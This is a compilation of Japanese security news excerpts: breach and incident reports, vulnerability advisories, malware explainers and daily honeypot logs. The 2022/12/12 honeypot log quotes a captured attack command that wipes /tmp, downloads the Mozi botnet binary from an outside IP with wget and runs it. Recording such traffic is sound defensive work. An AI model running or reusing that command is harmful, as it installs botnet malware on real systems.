琉球大学は、外部組織のウェブサイトで公開された同大資料に作成上の問題があり、個人情報を参照できる状態となっていたことを明らかにした。 同大によれば、2021年7月に外部組織のウェブサイトで公開された同大資料においてのべ378人分の個人情報を参照できる状態となっていたもの。学生の氏名、性別、学籍番号、所属学部、学外関係者の氏名、勤務先、教職員の氏名、電話番号などが含まれる。 2022年10月5日に同組織から掲載中の資料について確認依頼があり、調べたところ、提供したPDFファイルに問題があることが同月13日に判明。同大ではPDF作成ソフトを用いて墨塗りなど加工処理を行っていたが、一部の資料において処理の漏れや、PDF作成ソフトの編集機能などを用いることで墨塗りをはずすことができる状態となっていた。 外部組織では9月30日に資料の公開を停止したが、学外より同資料に対して13件のアクセスがあったこ
北國銀行は、振込不能の通知メールを無関係のオンラインバンキング契約者に対して誤送信するミスがあったことを明らかにした。アクセスが集中し、一時ログインしづらい状況に陥ったという。 同行によれば、12月5日に顧客1人に対して振込不能を通知するメールを送信しようとしたところ、誤って同行の個人向けオンラインバンキングサービス「北國クラウドバンキング」の全契約者約29万人へ送信するミスがあったという。また約6万人に対しては同様の内容が二重に送信された。 問題のメールは、同日11時より15時ごろにかけて配信され、メールを見た顧客からのアクセスが同行オンラインバンキングへ集中。ログインしづらい状況が発生し、サポートデスクの電話にもつながりにくい状態となった。 同行では、誤送信の原因について人為的なミスだったと説明。システムの不具合などは発生しておらず、同行に対するサイバー攻撃についても否定している。 ア
大阪市教育委員会において個人情報含むUSBメモリを一時紛失した。拾得者から同市に届け出があり、すでに回収されている。 同市によれば、12月1日14時ごろ、同市教委の職員が教員採用選考テストの説明会会場へ向かう途中、USBメモリがないことに気づき、同日14時5分ごろ、住民から拾得物として同USBメモリの届けられたことから紛失が判明した。 問題のUSBメモリには、説明会で利用する教職員4人分のインタビュー動画や、児童および生徒32人分の画像と動画が含まれていた。 移動途中に路上で鞄を開けて資料を取り出して確認した際、USBメモリを誤って落とした可能性があるという。対象となる児童と生徒には、説明と謝罪を行った。 (Security NEXT - 2022/12/06 ) ツイート
PDFファイルにおいて、パスワードや権限の設定機能を利用しているユーザーは5割強とする調査結果をアドビが取りまとめた。設定によっては、PDFファイルをあとから加工したり、修正が可能であることを6割強が知らなかったという。 同社では、10月に日本国内におけるPDFファイルの利用状況についてインターネット調査を実施し、結果を取りまとめたもの。月に1回以上PDFファイルを扱う20歳から59歳のビジネスパーソン600人が回答した。 コロナ禍前後におけるPDFファイルの利用頻度について聞いたところ、「以前よりも大幅に増えた(15.0%)」「どちらかというと以前よりも増えた(32.3%)」など、約半数が増えたと回答した。 普段利用する機能としてもっとも多かったのは「変換機能」で57.8%。次いで「コメント、ノート注釈、ハイライト、スタンプの追加」が32.7%、「ファイルの結合、分割、削除、回転、並べ替
コーヒー豆の通信販売サイトが不正アクセスを受け、顧客のクレジットカード情報が流出し、不正に利用された可能性があることがわかった。 通販サイト「珈琲の王国Beans510」を運営するビーンズゴトーによれば、システムの脆弱性を突く不正アクセスを受け、決済アプリケーションを改ざんされたもの。 3月15日から8月23日にかけて、同サイトでクレジットカード決済を利用した顧客252人に関するクレジットカードの名義、番号、有効期限、セキュリティコードが外部に流出し、不正に利用された可能性がある。 8月23日にクレジットカード会社から情報流出の可能性について指摘があり、問題が発覚。同サイトにおけるクレジットカード決済を停止した。8月31日に個人情報保護委員会に報告している。 外部事業者の調査は11月4日に完了し、11月14日に警察への被害を申告した。12月8日より、対象となる顧客にメールで報告と謝罪を行っ
バッファローが提供する複数のWi-Fi関連製品に脆弱性が明らかとなった。ファームウェアのアップデートが呼びかけられている。 「WSR-3200AX4S」や「WSR-2533DHP」をはじめ、同社が提供するWi-Fiルータ11機種や、Wi-Fi中継機2機種に脆弱性が明らかとなったもの。3件の脆弱性が判明しており、製品によって影響を受ける脆弱性は異なるが、少なくとも2件の影響を受けるという。 ドキュメントに記載がないデバッグ機能が有効化される脆弱性「CVE-2022-43486」や、OSコマンドインジェクションの脆弱性「CVE-2022-43443」「CVE-2022-43466」などが判明した。 「CVE-2022-43466」「CVE-2022-43486」に関しては、悪用にあたり管理画面へのアクセス権限が必要だとしている。 共通脆弱性評価システム「CVSSv3.1」においてベーススコアは
Cisco Systemsが提供する一部IP電話にゼロデイ脆弱性が明らかとなった。すでに実証コード(PoC)が公開済みだという。 「Cisco IP Phone 7800シリーズ」や、「Cisco Wireless IP Phone 8821」以外の「同8800シリーズ」に脆弱性「CVE-2022-20968」が明らかとなったもの。 「Cisco Discoveryプロトコル」の処理において入力検証に不備があり、細工されたパケットを処理するとスタックオーバーフローが生じ、リモートよりコードを実行されたり、サービス拒否を引き起こすおそれがある。 隣接ネットワーク内より攻撃が可能であり、共通脆弱性評価システム「CVSSv3.1」のベーススコアは「8.1」、重要度は「高(High)」とレーティングされている。 脆弱性が実際に攻撃へ悪用されたとの報告はないが、脆弱性について公開の場で議論されており
東海国立大学機構は、運用するサーバがランサムウェアによるサイバー攻撃を受け、大学関係者に関する個人情報が外部に流出した可能性があることを明らかにした。 同機構によれば、2021年7月より運用を開始した「Microsoft 365」のアカウントを管理する認証システムのサーバに対して、外部よりサイバー攻撃が行われたもの。ランサムウェアによりデータの一部を暗号化され、ログ解析の結果、最大約4万人分の個人情報が流出した可能性があることがわかった。 対象となるのは、2021年7月以降に名古屋大学に所属した学生および教職員と、2022年5月以降に岐阜大学に所属した教職員。氏名や所属、身分、生年月日、性別、学生番号、職員番号にくわえて、機構のID、アカウント、ハッシュ化されたパスワード、メールアドレスなどが含まれる。 10月17日に利用者からパスワードを変更できないとの連絡があり、調査を行ったところ、翌
大阪市は、同市や業務委託先より個人情報含むメールを第三者へ誤って送信するミスがあったことを明らかにした。 同市によれば、11月30日16時ごろ、スポーツイベント魅力発信業務の委託先より、同市職員へ個人情報を含むファイルを添付してメールを送信したところ、誤って第三者へ送信するミスが発生した。問題のファイルには、地域スポーツ関係団体担当者14人の氏名、住所、電話番号、ファックス番号が含まれる。 さらに同日17時ごろ、同市職員より受託事業者から送られたメールに対し、地域スポーツ関係団体担当者30人に関する氏名、電話番号、メールアドレスなど別の個人情報を含むファイルを添付して返信したことから、再度第三者へメールが送信された。 送信直後に誤送信先より指摘があり、問題が発覚。同市が委託先に確認したところ、最初の誤送信発生後に誤送信先より指摘を受けていたが、同市へ報告を行っていなかった。 委託先では同日
Fortinetのセキュリティゲートウェイ「FortiGate」などでOSとして搭載されている「FortiOS」に深刻なゼロデイ脆弱性が明らかとなった。すでに悪用が確認されており、同社では機器が侵害されていないか早急にログを確認するよう呼びかけている。 同社では、現地時間12月12日にアドバイザリをリリースし、「FortiOS」の「SSL VPN」機能にヒープベースのバッファオーバーフローの脆弱性「CVE-2022-42475」が存在することを明らかにした。リモートより細工したリクエストによって認証なしにコードやコマンドの実行が可能となる。 同社では、同脆弱性について共通脆弱性評価システム「CVSSv3.1」のベーススコアを「9.8」、重要度をもっとも高い「クリティカル(Critical)」とレーティングしている。 同社では、脆弱性を修正した「FortiOS 7.2.3」「同7.0.9」「
Citrixが提供する「Citrix ADC」「Citrix Gateway」にリモートより攻撃が可能となる深刻な脆弱性が明らかとなった。すでに悪用が確認されており、同社では早急にアップデートを実施するよう利用者へ呼びかけている。 同社が、現地時間12月13日にセキュリティアドバイザリをリリースし、認証なしにリモートよりコードの実行が可能となる脆弱性「CVE-2022-27518」を明らかにしたもの。 「SAML SP(サービスプロバイダ)」や「SAML IdP(IDプロバイダ)」として構成している場合に影響があり、同社では脆弱性の重要度を「クリティカル(Critical)」と評価している。 同社によると、一部の標的型攻撃において同脆弱性の悪用が実際に確認されているという。 同社では共通脆弱性評価システム「CVSSv3」のベーススコアを示していない。米国立標準技術研究所(NIST)による脆
OpenSSLの開発チームは、サービス拒否を引き起こすおそれがある脆弱性が見つかったことを明らかにした。重要度は低く、同脆弱性を単独で修正するアップデートのリリースは行わないとしている。 「X.509証明書」のポリシーに関する処理に不備があり、サービス拒否が生じるおそれがある脆弱性「CVE-2022-3996」が明らかとなったもの。 開発チームでは、一般的に見られる設定ではないとし、脆弱性の重要度を、4段階中もっとも低い「低(Low)」とレーティングしている。 米国立標準技術研究所(NIST)の脆弱性データベース「NVD」では、共通脆弱性評価システム「CVSSv3.1」においてベーススコアを「7.5」、重要度を「高(High)」と評価している。 同脆弱性は、「同3系」に影響があり、「同3.0.7」および以前のバージョンに存在。「同1.1.1」「同1.0.2」は影響を受けない。ソースリポジト
日本コンピュータセキュリティインシデント対応チーム協議会(日本シーサート協議会)は、CSIRTメンバーの育成方法について解説した資料「CSIRT人材の育成 Ver1.0」を公開した。 同資料は、同協議会会員によるベストプラクティスなどをもとに、CSIRT人員の育成方法について取りまとめたもの。同協議会のウェブサイトよりPDFファイルとして入手できる。 「CSIRT人材の定義と確保 Ver.2.1」により定義された役割やスキルを踏まえて、全体統括、インシデント対応、情報収集、開発支援など、各役割について解説。基礎教育修了者や初心者など、人員のステップに応じた目標、学習や経験が必要となる業務、達成目安などを紹介している。 (Security NEXT - 2022/12/16 ) ツイート
関西テレビ放送は、番組関連の映像が記録されたポータブルハードディスクの所在がわからなくなっていることを明らかにした。 同社によれば、12月10日早朝に制作会社のスタッフが電車内でハードディスクが入った鞄ごと紛失したもの。電車内で居眠りをしていた際に盗難被害に遭ったと見られる。 ハードディスクはスタッフの私物で、放送前のロケ取材の映像や関連映像が記録されている。ロックはかかっていなかった。 警察に被害届を提出。12月14日の時点で鞄と鞄のなかに入っていた私物の一部は発見されたが、ハードディスクは見つかっていないという。 同社では、出演者や取材協力者など関係者に説明と謝罪を行っている。 (Security NEXT - 2022/12/19 ) ツイート
Fortinetは、同社ゲートウェイ「FortiGate」に採用されている「FortiOS」に深刻な脆弱性「CVE-2022-42475」が見つかった問題で、アップデートを追加した。 「CVE-2022-42475」は、バッファオーバーフローの脆弱性。リモートより悪用されるおそれがあり、すでに脆弱性を標的とした攻撃が確認されている。 同社では、現地時間12月12日にセキュリティアドバイザリを公開し、アップデートを提供するとともに、侵害の有無を確認するよう注意喚起を行ってきたが、あらたに2022年9月にサポートが終了した「同6.0」系に対しても脆弱性へ対処した「同6.0.16」を現地時間12月14日にリリースした。 同社では同バージョンも含め、修正版として「FortiOS 7.2.3」「同7.0.9」「同6.4.11」「同6.2.12」「同6.0.16」および「FortiOS-6K7K 6.
日野市立図書館は、サーバなど一部機器がランサムウェアに感染したことを明らかにした。一部サービスは停止しているものの、貸出システムなど大部分は無事だったため、通常どおり開館している。 同館によれば、中央図書館事務室内のノートパソコン1台と、中央図書館内に設置しているサーバ5台がランサムウェアに感染したもの。12月17日に被害へ気がついた。 ファイルサーバ内に格納されていたデータが暗号化され、利用できない状態となっている。イベントの参加者、障害者サービスの利用者、ボランティアの名簿など個人情報が含まれる。12月19日時点で、外部においてこれら情報の流出は確認されていない。 貸出システムなど大部分のシステムは被害を受けておらず、開館しているが、利用者用インターネット公開端末、オンラインデータベース端末、集会施設の新規利用申し込み、障害者向けサービスなど一部サービスについて提供を見合わせている。
マイクロソフトは、プライベートに設置された「Minecraft」のサーバを狙ってDDoS攻撃を展開するボットネットを確認した。脆弱なIoT機器が踏み台として悪用されているとして注意を呼びかけている。 クロスプラットフォームで活動するボットネット「DEV-1028」を確認したもの。Windowsに感染し、さらにLinuxベースのIoTデバイスへ感染を広げるもので、「Minecraft」のサーバを攻撃することから「MCCrash」と名付けている。 Windowsに対しては、「Windows」を不正にアクティベートできるなどとした「クラッキングツール」を通じてボットプログラムを拡散。 感染後はネットワーク経由で管理が行き届いていないIoTデバイスに対し、SSH経由で初期設定の認証情報など用いた辞書攻撃を展開して感染を広げていたという。 ボットネットでは、プライベートに設置された「Minecraf
ハニーポット(仮) 観測記録 2022/12/15分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス zgrabによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-20
ハニーポット(仮) 観測記録 2022/12/14分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Apache Tomcatへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 を確認しました。 Location:US CensysInspectによるスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:UK D-link製品の脆弱性を狙うアクセス aiohttpによるスキャン行為 /.gi
ハニーポット(仮) 観測記録 2022/12/13分です。 特徴 共通 Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 を確認しました。 Location:US /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:UK .jsへのスキャン行為 を確認しました。 Location:SG curlによるスキャン行為 .cssへのスキャン行為 /.gitへのスキャン行為 Gh0stRATのような動き を確認しました。 他 アクセス数推移 J
ハニーポット(仮) 観測記録 2022/12/12分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 /.envへのスキャン行為 Location:JP node-fetchによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget http://124.234.245.55:57144/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws Location:US Apache Tomcatへのスキ
ハニーポット(仮) 観測記録 2022/12/11分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス /.gitへのスキャン行為 を確認しました。 Location:US Location:UK D-link製品の脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス /.gitへのスキャン行為 を確認しました。 Location:SG Spring Bootの脆弱性を狙うアクセス curlによるスキャン行為 okhttpによるスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。
ハニーポット(仮) 観測記録 2022/12/09分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス クラウド環境のメタデータ情報を狙うアクセス CensysInspectによるスキャン行為 aiohttpによるスキャン行為 curlによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 5.188.210.227に関する不正通信 Gh0stRATのような動き を確認しました。 Location:US NetGear製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 /.gitへのスキャン行為 phpM
ハニーポット(仮) 観測記録 2022/12/08分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス CensysInspectによるスキャン行為 fasthttpによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるス
ハニーポット(仮) 観測記録 2022/12/07分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス .jsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 WordPressへのスキャン行為 を確認しました。 Location:UK NetGear製品の脆弱性を狙うアクセス Spring Cloud
ハニーポット(仮) 観測記録 2022/12/06分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 .cssへのスキャン行為 /.gitへのスキャン行為 20.247.88.180に関する不正通信 Gh0stRATのような動き を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 /.gitへのスキャン行為 20.247.88.180に関する不正通信 を確認しました。 Location:UK D-link製品の脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス Spring
2022 年も残りわずかとなり今年の振り返りをする時期になりました。 yamory では脆弱性データベースを構築しているため日々公開される脆弱性情報を収集していますが、今年も多くの脆弱性・攻撃コード (PoC) を目にしました。 今回、yamoryの脆弱性データベースの情報や実際に脆弱性スキャンによって検知された脆弱性情報から今年はどのような傾向があるのか、今後どのような対策が必要になるのかを分析し、脆弱性セキュリティレポートとして公開しました。 本記事では脆弱性セキュリティレポートの内容を一部紹介したいと思います。 脆弱性セキュリティレポートはこちらよりお申し込みください。 脆弱性数の推移世の中に公開されている脆弱性データベースとして有名なものとして、アメリカ国立標準技術研究所NISTが管理する NVD (National Vulnerability Database) があります。 N
RedLineとRacoonはどちらもインフォスティーラーです。 これらはこれまでもそれぞれに多く観測されています。 そして最近のGroup-IBの調査によるとstealer-as-a-serviceと呼べるような活動が展開されていることが確認されています。 情報交換の場所 情報交換はTelegramで行われています。 ここに複数のグループが構成され、そのそれぞれが詐欺チームとして活動します。 多くのグループがあるようですが、アクティブなものは2021年から2022年の範囲で見ると34あります。 大きなチーム Telegramのグループはそのまま詐欺活動のチームになっています。 チームによって規模に違いはあると思いますが、平均するとメンバーは200人を超えているということです。 使用するマルウェア チームによって使用するマルウェアが異なります。 確認された情報によると、RedLineを使用
SharkBotはAndroid環境をターゲットとしたバンキングトロイマルウェアです。 また作戦を変更して活動を継続しています。 SharkBotはアンチウイルスアプリに成りすますところから始まりました。 次に機能を減らしてみたりした段階もありました。 今度はどういう作戦でしょう。 ファイルマネージャー? 今度はファイルマネージャーに成りすまします。 防御側もいくつもの策を講じてきています。 その策の中に、権限の制限があります。 アンチウイルスを実施するアプリケーションにはファイルを読み込む権限は必要かもしれないけどファイルを書き込む権限は必要ないでしょ、という具合です。 さぁ困りました、どうしましょう。 いいこと考えました。 アンチウイルスに成りすますのではなくファイルが書き込めるものに成ればよいのです。 今度はファイルマネージャーが選択されました。 ファイルマネージャーはファイルを管理
いろいろな組織が攻撃されています。 自治体などの公的機関も範囲外ではありません。 そして今回警察が攻撃対象となり、侵害によって入手されたデータが公開されてしまっています。 攻撃対象 ベルギーの地方警察が侵害されています。 現在の調査ではベルギーの国家警察ネットワークまでは侵害されていないという発表になっています。 国家警察ネットワークは侵害されていない、地域警察のデータのみである、とはいうものの、漏洩されたデータの規模は何千人もの人々に及びます。 漏洩データの内容 何千もの車のナンバープレート、罰金、犯罪報告ファイル、人事の詳細、調査報告書などが漏洩されています。 加えて交通監視カメラの映像が含まれており、特定の日時における個人の所在が明らかになります。 こういった種類のデータは、犯罪や虐待を報告した人々を暴露する可能性があり、進行中の法執行活動や調査を危険にさらす可能性があります。 ある
TikTokは利用者の多いサービスです。 いろいろな新しいチャレンジが企画され、利用者の興味を持続させます。 結構前になりますが、アイスバケツチャレンジとかありましたよね、ああいうのです。 最近注目の集まっているチャレンジがあります。 #invisiblechallenge です。 TikTokでは多くの動画が公開されます。 いかに面白いものを作るかで注目度合いが変わります。 提供されたフィルターに人の体が見えなくなる効果の出るものが追加されました。 invisible filterです。 これを使って多くの人が動画を公開しています。 このフィルターを使うと、フィルターが有効な間だけ体がマスクされた状態にすることができます。 たとえばうまく使うと透明人間になるような動画も作ることができるというわけです。 たとえばこういうものです。 マスクされた髪の長い人が踊っています。 マスクされているの
セキュアブートセキュリティ機能は、Trusted Platform Module(TPM)チップとUnified Extensible Firmware Interface(UEFI)ファームウェアを搭載したコンピューターで、信頼されていないオペレーティングシステムのブートローダーをブロックし、起動プロセス中にルートキットやブートキットなどの悪意のあるコードが読み込まれないようにします。 最近のほとんどのPCはセキュアブートに対応しています。 セキュアブートのリリースから時間があまり経過していないころは、Linuxなどの一部のOSでは対応に苦戦していたこともありましたが、いまではメジャーなOSは対応しているものが多いと思います。 このセキュアブートをいつの間にか無効にされてしまうというバグがAcerの一部の機種にあったのですが、これが修正されています。 対応された脆弱性はCVE-2022-
Dolphinはバックドアです。 ScarCruft APTに展開されています。 高機能 ドライブやポータブルデバイスの監視、関心のあるファイルの抽出、キーロギングとスクリーンショットの取得、ブラウザーからの資格情報の盗用など、多くの機能を備えます。 継続的な更新 2021年から観測されていますが、これまでの間に何度も更新版の存在が確認されています。 継続的に更新されています。 多段階で展開 このマルウェアは多段階で展開されます。 それぞれの段階が検出を回避しようとする実装がなされているため、解析が容易ではありません。 Internet Explorerのエクスプロイトやシェルコードなど、複数のコンポーネントで攻撃が構成され、BLUELIGHTバックドアが設置されます。 そしてBLUELIGHTバックドアはDolphinを設置します。 狙い撃ち BLUELIGHTバックドアはDolphin
DuckLogsはMaaSです。 MaaSはMalware-as-a-Serviceです。 これまで観測されていない新しいものと考えられます。 スティーラー、キーロガー、クリッパー、リモートアクセスなどの機能を提供します。 内容を見てみましょう。 課金するだけでマルウェア犯罪を開始する マルウェアを作成するために特別な技術は必要ありません。 MaaSに課金して、そのWebシステムを操作するだけでマルウェア犯罪を開始できます。 課金形態もいくつか用意されています。 1か月契約は19.99ドル、3か月契約は39.99ドル、生涯契約は69.99ドルです。 マルウェア作成はボタンを押すだけ マルウェア作成はどうやるのでしょう。 MaaSのコントロールパネルにログインして、作成したいマルウェアの種類を選択して生成ボタンを押すだけです。 マルウェアの種類によってはいくつかのオプションがあります。 その
Black Proxiesは話題が高まっているプロキシサービスです。 Black Proxies以外にも多くのプロキシサービスがあります。 しかしBlack Proxiesはちょっと他のプロキシサービスとは異なる点があります。 residential proxies 通常、大規模にサービスを提供するシステムはデータセンターなどで運用されています。 ということはそのシステムのIPアドレス空間はデータセンターにあるということになります。 しかしBlack Proxiesはそうではありません。 Black Proxiesの提供するプロキシシステムで利用されるIPアドレスは一般家庭で利用されているIPアドレスになっています。 residential proxiesというわけです。 Black Proxiesのサービスを経由することで、プロキシの利用者は別の一般の誰かであるかのようにネットワーク上で
PRootは任意のディレクトリを新しいルートファイルシステムとして使用することができるようにする管理者向けツールです。 そしてBYOFはBring Your Own Filesystemという攻撃手法です。 どういうものでしょう。 ツールの詰め合わせ 攻撃には多くのファイルを使用したくなります。 いろいろなツールがあるほうが便利です。 この攻撃手法ではツールを1つのファイルシステムの状態にまとめて扱うことができるため、必要なものを全部含めた状態で相手環境に持ち込むことができます。 独立して動作する PRootで作成されたコマンド群はそのファイルシステムの中側にしか依存しません。 通常Linuxにはいろいろなディストリビューションがあり、そのディストリビューションによってライブラリのPATHなどのファイルの構成が異なります。 このため通常プログラムをコンパイルしたものを何かの環境に持ち込んで
CryWiperは名前の通りワイパーです。 データを消し去ってしまいます。 でも単に消すわけではありません。 もう少しひどい動きをするように実装されています。 ファイルはexe形式 CryWiperはC++で書かれたマルウェアです。 観測されている活動時のファイル名はbrowserupdate.exeです。 64ビットWindows実行可能ファイルとしてコンパイルされていて、多くのWinAPI関数を使って活動します。 だんだん進行する 攻撃はだんだん進行します。 一度に全部を実行するのではなく、徐々に攻撃を進めていきます。 5分に1回実行される形式でスケジュールが作成されて活動を継続します。 まばらな実行 攻撃はスケジュールで5分毎に実行されるようになっていますが、毎回必ず進むわけではありません。 起動されるたびにマルウェアはC2に通信を行い、攻撃を進めるか休止するかの指令を受けます。 こ
AIはArtificial Intelligenceです。 人工知能です。 過去のSF映画の中ではAIは夢の技術でした。 AIを搭載したロボットが歩き回り、人間と一緒に動いていろいろな役割を提供します。 これはだんだんと映画の中の話ではなくなってきています。 AIの出てきたころ、AIにできることはこういうものでした。 大量のデータ処理 ルールに沿った作業 共通点を見つける作業 囲碁・将棋の対局 画像処理や画像認識 コンピュータがデータを分析し、推論(知識を基に、新しい結論を得ること)や判断、最適化提案、課題定義や解決、学習(情報から将来使えそうな知識を見つけること)などを行うことができます。 いろいろな研究が継続されていく中で、AIのできることは広がりを見せています。 そしてその追加されることが見えてきたことの中の一つに、プログラミングがあります。 コンピュータ言語のプログラミングです。
Internet Explorerの脆弱性を悪用した攻撃はかつて多くありました。 いまでは主要なブラウザではなくなってきたこともあり、Internet Explorerの脆弱性を悪用した攻撃の数自体は減少していると考えられます。 しかしまた新たなInternet Explorerの脆弱性を悪用した攻撃が観測されています。 対象の脆弱性はCVE-2022-41128です。 攻撃は次のように進みます。 話題性のある内容とタイトルの記事を用意する 今回は2022年10月29日のハロウィーンのお祝いの際に、韓国ソウルの梨泰院周辺で起こった悲劇的な事件が選択されています。 記事をMicrosoft Wordの文書にする Word文書にリッチテキストファイル(RTF)リモートテンプレートを使用する このように設定することで、WordはRTFファイルをリモートから取得します。 RTFがInternet
Truebotの活動が活性化しています。 Truebotそのものは新しいものではなく2017年から観測されています。 しかし最近の他のマルウェアと同じように、何度も変更されながら展開されてきています。 最近のTruebotの動きを見てみましょう。 初期感染経路はどんどん変わる 従来は初期感染経路はメールでした。 しかしメールではない経路がどんどんと追加されてきています。 Netwrixというセキュリティ製品の脆弱性を悪用した方法や、Raspberry RobinというUSBドライブを介して拡散するマルウェアを使う方法などが観測されています。 他にもまだあるようですが、情報がまだ十分に集まっていません。 情報収集 初期感染が完了すると、Truebotキャンペーンの活動は情報収集の段階となります。 スクリーンショット、コンピューター名、ローカルネットワーク名、Active Directoryの
FortiOSに対して新しいパッチがリリースされています。 FortiOSはフォーティネット製品用に実装されているOSです。 この中に含まれるSSL-VPN機能を提供する機構に関しての修正です。 2022年10月10日にFG-IR-22-377というアドバイザリがリリースされました。 このアドバイザリではFortiOSに認証バイパスの脆弱性があることが示されていました。 認証されていない攻撃者が特別に細工されたHTTPまたはHTTPSリクエストを介して管理インターフェイスで操作を実行できる可能性があるというものです。 CVSSv3ベーススコアは9.6でした。 CVSSv3ベーススコアは最大が10.0です。 つまり最高に近い重大度の内容とされています。 悪用事例として、認証バイパスして接続した通信のなかで管理権限のあるアカウントを作成しているケースが観測されています。 メーカーは緊急での更新
GoTrimはGoで書かれたBot型マルウェアです。 2022年9月以降観測されている比較的新しいものです。 これまでに確認されている他のマルウェアとは少し違った動きをすることがわかってきました。 感染先はCMS ターゲットはCMS(コンテンツマネジメントシステム)です。 現時点ではWordPress、Joomla!、OpenCart、DataLife Engineの4種が攻撃対象となります。 Botからブルートフォース 自己増殖するタイプのBotネットがよくありますがGoTrimは少し違います。 GoTrimはC2から渡されたドメイン名と認証情報を使ってBotから他のシステムにブルートフォース攻撃を実施します。 ログインに成功した場合にだけそのドメイン名と認証情報の情報をC2に返します。 Botの追加は攻撃者が実施 Botの動作によって追加の被害者となるシステムのドメイン名と認証情報の情
ESXiはVMwareの仮想マシンを動作させる環境で通常ハイパーバイザと呼ばれる種類のソフトウェアです。 いろいろなソフトウェアには多くの既知の問題があります。 多くの既知の問題の多くはすでに対策が実施されており、その対策を適用することのできるパッチが提供されています。 しかしその既知の問題に対処した状態にできるかどうかは利用者がその対策を適切に適用しているかどうかに依存します。 ESXiのパッチの提供されている脆弱性の中に、CVE-2019-5544とCVE-2020-3992というものがあります。 CVE-2019-5544は、OpenSLPのヒープの上書きの問題であり結果としてリモートコード実行を成り立たせてしまう問題です。 CVE-2019-5544の対策は2019年に提供されています。 CVE-2020-3992は、OpenSLPのヒープの解放後の利用の問題であり結果としてリモー
Qbotは2008年頃から観測されているバンキング型トロイの木馬です。 Qakbot、QuackBotなどの別名で認識されている方もいることでしょう。 このマルウェアは手を変え品を変え侵入してきます。 そして侵入するとシステムから銀行口座関連のデータや、キー入力、ログイン情報などを盗み取ります。 先日研究者が新しい手法で入ってくる事例を観測しました。 添付ファイルがメールで届く ある意味ここはいつもの手法です。 これまでのスタイルのままといえます。 添付ファイルはSVG SVGはなんでしょう。 SVGはScalable Vector Graphicsで画像フォーマットの1つです。 JPEGだとかそういったよくある画像形式の場合基本的に点を使って画像を構成します。 しかしSVGはVectorという単語を含むことから想像いただけるように線を使って画像を構成します。 そしてSVGのファイルの構成
Gluptebaはトロイの木馬です。 ブロックチェーンの技法を使用して悪事を展開します。 どんな動きをするのでしょう。 ボットネット Gluptebaは一般のインターネットユーザに感染し、そのユーザの環境をボットネットに加えます。 加えられた環境はボットネットの一部としてサイバー犯罪者に販売されてしまいます。 単独での被害 Gluptebaに感染するとそのパソコンはボットネットの一部となりますが、そのまえにGluptebaそのものの機能によって犯罪者に利用されてしまいます。 Gluptebaは感染すると暗号通貨をマイニングし、ユーザーの資格情報とCookieを盗みます。 Gluptebaはモジュール式の構造になっていて、WindowsシステムとIoTデバイスにプロキシを展開するモジュールも持っています。 ブロックチェーンの悪用 GluptebaはBitcoinブロックチェーンを使用します。
